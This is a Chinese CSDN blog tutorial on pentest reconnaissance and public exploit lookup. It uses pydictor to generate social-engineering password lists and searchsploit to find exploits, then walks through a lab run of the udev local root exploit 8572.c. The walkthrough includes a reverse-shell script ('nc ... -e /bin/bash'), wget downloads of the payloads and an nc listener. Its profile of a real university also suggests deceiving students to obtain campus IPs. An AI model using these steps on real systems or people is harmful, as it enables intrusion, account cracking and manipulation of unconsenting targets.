信息收集--关联信息及漏洞情报

最新推荐文章于 2024-07-03 12:10:57 发布
最新推荐文章于 2024-07-03 12:10:57 发布
阅读量614 收藏 2
点赞数 2
分类专栏: 渗透测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44555676/article/details/119568487
版权

关联信息生成和开放漏洞情报

一、关联信息生成

在渗透前期工作开展之前,需要对目标的各种信息进行分析、拆分、组合。
例如:华南师范大学
根据地域习惯、宗教、互联网开放信息等信息进行简要拆分,假设获取的信息如下:

  • 广东人有祭祖习惯
  • 广东人口味清淡
  • 华师学生比较乖、低调、老实本分型,可以线下进行诱导欺骗从而获得校内网ip
  • IPV4地址开放lP段
  • 相关社交网络公开的数据库
  • 校园论坛

根据宗教、习惯、IP地址、开放数据支持…等,为后续的字典生成、鱼叉、水坑攻击铺下基石。

1.字典生成

pydictor

  • 安装:
 $ git clone https://github.com/LandGrey/pydictor

在这里插入图片描述

  • 生成字典
$ cd pydictor
$ python pydictor.py

在这里插入图片描述
快速使用:https://github.com/LandGrey/pydictor/blob/master/docs/doc/usage.md

社会工程学字典:python pydictor.py --sedb
在这里插入图片描述
配置选项,然后查看当前配置然后生成字典

set cname liwei
set birth 19880916
show
run

在这里插入图片描述
在这里插入图片描述

$ vi sedb_153951.txt

在这里插入图片描述

  • 合并去重
    $ python pydictor.py -tool uniqbiner /my/all/dict/
$ mkdir ./tmp

在这里插入图片描述

$ mv 1.txt 3.txt ./tmp/

在这里插入图片描述

$ python pydictor.py -tool uniqbiner ./tmp/

在这里插入图片描述

  • 多字典文件组合工具
    $ python pydictor.py -tool hybrider heads.txt some_others.txt tails.txt
$ mv * ../

在tmp文件夹下移动当前文件夹下的所有文件到上一级目录
在这里插入图片描述

$ python pydictor.py -tool hybrider 1.txt 3.txt

在这里插入图片描述

二、开放漏洞情报

1.常用网站

  • CVE #通用漏洞披露
  • Exploit-DB #漏洞提交平台
  • Cx Security #漏洞数据库
  • CNVD #国家信息安全漏洞共享平台
  • securitytracker #漏洞数据库
  • github #开源及私有软件项目的托管平台
  • seebug #知道创宇漏洞数据库
  • exploits.shodan.io

2.Search Exploit-DB

kail自带

$ searchsploit

在这里插入图片描述

示例

  • 搜索Windows提权漏洞
$ searchsploit -t windows local

在这里插入图片描述
在这里插入图片描述

  • 搜索Apache漏洞
$ searchsploit -t Apache

在这里插入图片描述

实际操作可以看看这个
searchsploit工具(exploit-db.com)使用实例:https://blog.csdn.net/whatday/article/details/102821589

试一试实例

1. 查找漏洞

搜索 privilege,然后使用 grep 命令来缩小查找范围,加上 -i 参数忽略大小写

$ searchsploit privilege | grep -i linux | grep -i kernel | grep 2.6

在这里插入图片描述
使用 8572.c 这个exp,它利用了 UDEV 设备管理器中的一个漏洞,允许通过未经验证的 Netlink 消息来执行代码

linux/local/8572.c

使用 locate 命令来查找完整的路径

$ locate linux/local/8572.c

在这里插入图片描述/usr/share/exploitdb/exploits/linux/local/8572.c

2. 本地 kali 中搭建 Apache 服务器

执行以下命令

$ service apache2 restart

在这里插入图片描述
测试
在浏览器中输入localhost测试Apache是否配置成功
在这里插入图片描述

3. exp 上传到靶机中

在服务器文件目录下建立 exp 所在位置的符号链接,这样 exp 才可以下载
执行以下命令

$ ln -s /usr/share/exploitdb/exploits/linux/local/ /var/www/html/

在这里插入图片描述

使用nano /var/www/html/run 命令来创建一个文件并输入下面内容:

#! /bin/bash            
nc 192.168.70.11 4321 -e /bin/bash

在这里插入图片描述
按Ctrl+X

如果你修改了文件,下面会询问你是否需要保存修改。输入Y确认保存,输入N不保存,按Ctrl+C取消返回。

如果输入了Y,下一步会让你输入想要保存的文件名。如果不需要修改文件名直接回车就行;若想要保存成别的名字(也就是另存为则输入新名称然后确定。这个时候也可用Ctrl+C来取消返回。

我们使用 Ctrl-X, Y, 和 Enter 进行保存

将 exp 上传到靶机

$ cd /tmp
$ wget http://192.168.70.11/run
$ wget http://192.168.70.11/local/8572.c

在这里插入图片描述

4.编译执行

使用 gcc 命令,使用 -o 参数来指定输出文件的名字

$ gcc -o exploit 8572.c

使用 -B 参数来指定链接器的位置

$ gcc -B /usr/bin -o exploit 8572.c

使用 ls 命令来查看可执行文件是否已经成功编译

$ ls

在这里插入图片描述
找到 Netlink 套接字的 PID

$ cat /proc/net/netlink

在这里插入图片描述

使用 ps aux | grep udev 来查看 UDEVD 的 PID

$ ps aux | grep udev

在这里插入图片描述
把PID减去1之后运行,发现不行,再仔细找了一下,啊哈哈,我Ubuntu好像没有这个本地漏洞
在这里插入图片描述
不管了,接下来就是开启监听

$ nc -lvp 4321

在这里插入图片描述
如果有这个漏洞,监听之后应该是这样的

nc -lvp 4321
listening on [any] 4321 ...
192.168.70.144: inverse host lookup failed: Unknown host
connect to [192.168.70.11] from (UNKNOWN) [192.168.70.144] 34418
id
uid=0(root) gid=0(root)
whoami
root

回头看了一下,我Ubuntu版本太高了,这就尴尬了…

$ uname -a
$ lsb_release -a

在这里插入图片描述
在这里插入图片描述

Y小短腿
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于关联规则的网络信息安全风险度量分析模型
罗伯特技术屋
08-31 940
研究结果表明,网络样本的信息泄露量服从不同的对数正态分布,利用设计的度量分析模型,得出不同网络信息安全风险的指标值,通过与设置实际值的比较,发现模型输出值与实际值不存在明显的异方差。从当前的发展情况来看,现有的网络信息安全风险度量分析模型在设置安全风险度量指标时,主要利用专家知识和评估经验来判定当前网络的运行状态,这种度量指标设置方法主观性较强,不能确定网络信息主体在面对威胁攻击时的行为特征,难以对风险形成过程准确解读,因此得出的定量计算结果与实际结果之间存在较大差异。为孤岛中的信息在总信息资产中的占比;.
16-2 信息收集 - 渗透测试流程
weixin_43263566的博客
12-15 989
渗透测试是一种通过模拟恶意黑客的攻击方法来评估信息系统安全的一种评估方法。
浅谈攻击信息情报的分析
疯狂棒棒糖的博客
07-25 1121
1.信息情报关联信息收集过程中往往会收集很多杂乱无章的信息,需要依据一些筛选的规则和策略来去除掉垃圾信息,再由人工对剩余的信息进行技术分析,提取出有效的情报或者加以考证的情报来供后续情报分析。在一次分析中无用信息占比在80%左右,能够提取出的情报仅仅只有20%,所以对信息的分析是一项很细致的工作。接下来说一下情报收集的流程。 (1)信息是如何转变为情报的: 直接信息  à  可以直观...
漏洞信息收集
温柔小薛的博客
03-29 2686
漏洞信息收集 注:这是从xmind笔记下导入过来的,排版可能很乱,后期我会整理,请见谅 本文目录漏洞信息收集主域名及二级域名探测(总概括)域名探测子域名探测备案号查询google HACK信息探测子域名探测敏感信息收集(1)敏感信息收集(2)邮箱信息收集社工库历史漏洞收集工具信息收集常见指纹识别方式资产梳理fofa及nmap使用 主域名及二级域名探测(总概括) 域名探测 要对一个站点进行渗透测...
Searchsploit漏洞利用搜索工具的介绍及使用
最新发布
Reset
07-03 924
kali自带的,Searchsploit会通过本地的Exploit-db查找软件漏洞信息Exploit Database存储了大量的漏洞利用程序,是Offensive Security赞助的项目,目前是世界上公开收集漏洞最全的数据库,这个仓库每天都会更新。Exploit-DB是一个漏洞库,kali中保存了一个这个漏洞库的拷贝。
开源威胁情报整理——漏洞情报
m0_47420736的博客
12-10 1794
找数据的过程顺便记录一下,我用到的威胁情报的主要形式还是漏洞情报,所以本文主要是针对开源威胁情平台的漏洞情报做了个简单的整理。 奇安信漏洞情报 https://ti.qianxin.com/vulnerabilityhttps://ti.qianxin.com/vulnerability 绿盟漏洞报告 NTI - 绿盟威胁情报中心NTI - 提供专业的情报在线查询服务,帮助客户及时洞悉公网资产面临的安全问题,为客户提供最新的威胁动态,结合安全>数据深度分析,提升未知攻击检测和主动的威胁防.
bug与漏洞的概念与关联 ------<bug == 漏洞 ???> 漏洞
laidie的博客
07-05 112
那么什么是漏洞呢?其实很好理解。
安全知识」情报驱动的关联分析及开放平台实践 - 应急响应.zip
11-27
情报驱动的关联分析及开放平台实践 - 应急响应》这一主题涵盖了信息安全领域的多个重要知识点,主要包括以下几个方面: 1. 情报驱动的安全管理:情报驱动的安全策略是现代网络安全的核心,它强调通过收集、分析和...
威胁情报新应用-量化信息安全风险.pdf
09-11
1. **全球威胁情报数据资源**:企业可以利用来自不同来源的全球威胁情报数据,如abuse.ch、alienvault OTX、FireEye/Mandiant等,来收集和分析恶意活动的信息。这些资源涵盖了各种威胁情报类型,包括恶意IP地址、...
精品--基于威胁情报基础库的关联关系可视化,本科毕业设计和答辩PPT,优秀毕设.zip
02-05
1. **威胁情报**:威胁情报是指收集、分析和整理的有关潜在或实际网络安全威胁的数据,包括恶意软件行为、攻击者战术、技术和程序(TTPs)、漏洞信息等。它是防御者了解和应对网络威胁的关键资源。 2. **关联关系**...
Kali-Linux渗透测试实战-21-DNS信息收集.docx
11-17
在Kali Linux渗透测试中,DNS信息收集是一个关键步骤,它可以帮助我们获取目标系统的初步情报。DNS(Domain Name System)是互联网的一项服务,它将域名转换为IP地址,便于网络通信。了解DNS工作原理和利用相关工具...
CTF工具 searchexploit - exp数据库.mht
12-13
CTF工具 searchexploit - exp数据库.mht
开放漏洞情报
m0_47420736的博客
10-19 3161
CVE #通用漏洞披露 Exploit-DB #漏洞提交平台 Cx Security #漏洞数据库 CNVD #国家信息安全漏洞共享平台 securitytracker #漏洞数据库 github杆源及私有软件项目的托管平台 seebug #知道创宇漏洞数据库 exploits. shodan.io ...
searchsploit使用
热门推荐
qq_38243607的博客
07-05 1万+
searchsploit”是一个用于Exploit-DB的命令行搜索工具,可以帮助我们查找渗透模块。 Exploit-DB是一个漏洞库,Kali Linux中保存了一个该漏洞库的拷贝,利用上面提到的命令就可以查找需要的渗透模块,它将搜索所有的漏洞和shellcode而且该漏洞库是保存在本地的,在没有网络的情况下也可以使用。 基本搜索方法就是searchsploit+可能包含漏洞的软件/系统等等,对应回显存在的漏洞和用于渗透的脚本。 参数 直接输入searchspliot可以看到该命令相关的参数:
SearchSploit漏洞查找工具使用指南
大方子
10-04 7627
什么是SearchSploit: “searchsploit”是一个用于Exploit-DB的命令行搜索工具,它还允许你随身带一份Exploit-DB的副本。 SearchSploit为您提供了在本地保存的存储库中执行详细的离线搜索的能力。这种能力特别适用于在没有互联网接入的情况下对网络进行安全评估。许多漏洞都包含了二进制文件的链接,这些文件不包含在标准存储库中,但可以在我们的Exploit-...
python采集器_python写exploit采集器
weixin_39616565的博客
11-30 275
importrequestsfrom bs4 import *importthreadingimportreimportoptparseurlsd=[]#neirons=[]defmain():parser=optparse.OptionParser()parser.add_option('-m',action='store_true',dest='home',help='Save the hom...
Exploit-DB 使用小结
未完成的歌~的博客
09-23 3747
是一个漏洞库网站 ,存储了大量的漏洞利用程序,可以帮助安全研究者和渗透测试工程师更好的进行安全测试工作,目前是世界上公开收集漏洞最全的数据库,该仓库每天都会更新。searchsploit 是一个用于搜索 Exploit-DB 漏洞数据的命令行工具(Kali默认已安装),可以离线搜索 Exploit 数据库,这对于有时候不能联网的渗透工作非常的有用。
网络安全searchsploit的使用!
xnxqwzy的博客
12-26 1342
是一个用于Exploit-DB的命令行搜索工具,可以帮助我们查找渗透模块。)这是Offensive Security()赞助的一个项目。存储了大量的漏洞利用程序,可以帮助安全研究者和渗透测试工程师更好的进行安全测试工作,目前是世界上公开收集漏洞最全的数据库,该仓库每天都会更新,exploit-db提供searchsploit利用files.csv进行搜索离线漏洞库文件的位置。
nvd漏洞信息数据集
07-01
### 回答1: NVD漏洞信息数据集是由美国国家漏洞数据库(National Vulnerability Database,简称NVD)提供的一组包含了各种软件和操作系统的安全漏洞信息的数据集。这个数据集是为了促进网络安全研究和漏洞管理而创建的。 NVD漏洞信息数据集的主要内容包括漏洞的名称、描述、危害级别、可利用性、解决方案、参考链接等。这些信息可以帮助企业和个人识别并修复系统中的安全漏洞,增强网络系统的安全性。 该数据集中的漏洞信息根据不同的标准进行分类和标记,比如CVE(通用漏洞漏洞名称)标识符。这使得研究人员和安全专家可以快速地找到相关的漏洞信息,对其进行深入分析和研究。同时,NVD还将漏洞信息与其他相关的漏洞数据库进行关联,以提供更全面和准确的信息。 NVD漏洞信息数据集在网络安全研究、漏洞评估、威胁情报等领域起到了重要作用。它为研究人员提供了一个基准,可以对比自己的研究成果,并且可以帮助他们发现新的安全漏洞。另外,NVD漏洞信息数据集也为企业和安全从业者提供了一个重要的参考,帮助他们及时发现并修复可能存在的漏洞,从而降低系统被攻击的风险。 总而言之,NVD漏洞信息数据集是一个重要的安全漏洞信息资源,对于网络安全研究、漏洞管理和威胁情报都有着积极的促进作用。 ### 回答2: NVD漏洞信息数据集是一种包含多个漏洞信息的数据集。NVD是“国家漏洞数据库”(National Vulnerability Database)的简称,它是美国国家标准与技术研究院(NIST)维护的一个公共数据库,用于收集、更新和发布各种软件、硬件和操作系统的漏洞信息。 NVD漏洞信息数据集包括了各种漏洞的详细信息,包括漏洞的名称、漏洞编号、漏洞描述、漏洞的严重程度等等。这些信息对于安全研究人员、开发人员和系统管理员来说非常有价值,可以帮助他们了解当前存在的漏洞,采取相应的防护措施。 使用NVD漏洞信息数据集,可以对漏洞进行分类和归纳,进而进行漏洞分析和评估。同时,该数据集还可以用于建立漏洞检测和防护系统,提供即时的漏洞更新和修复方案。 NVD漏洞信息数据集的更新频率较高,NIST团队会根据最新的漏洞信息不断更新和发布数据集。因此,我们可以及时地获取最新的漏洞信息,快速采取应对措施,提高系统的安全性。 总而言之,NVD漏洞信息数据集是一种非常有价值的资源,对于安全研究和漏洞防护都具有重要意义。使用该数据集进行漏洞分析和修复,可以帮助我们更好地保护系统的安全,减少潜在的安全风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值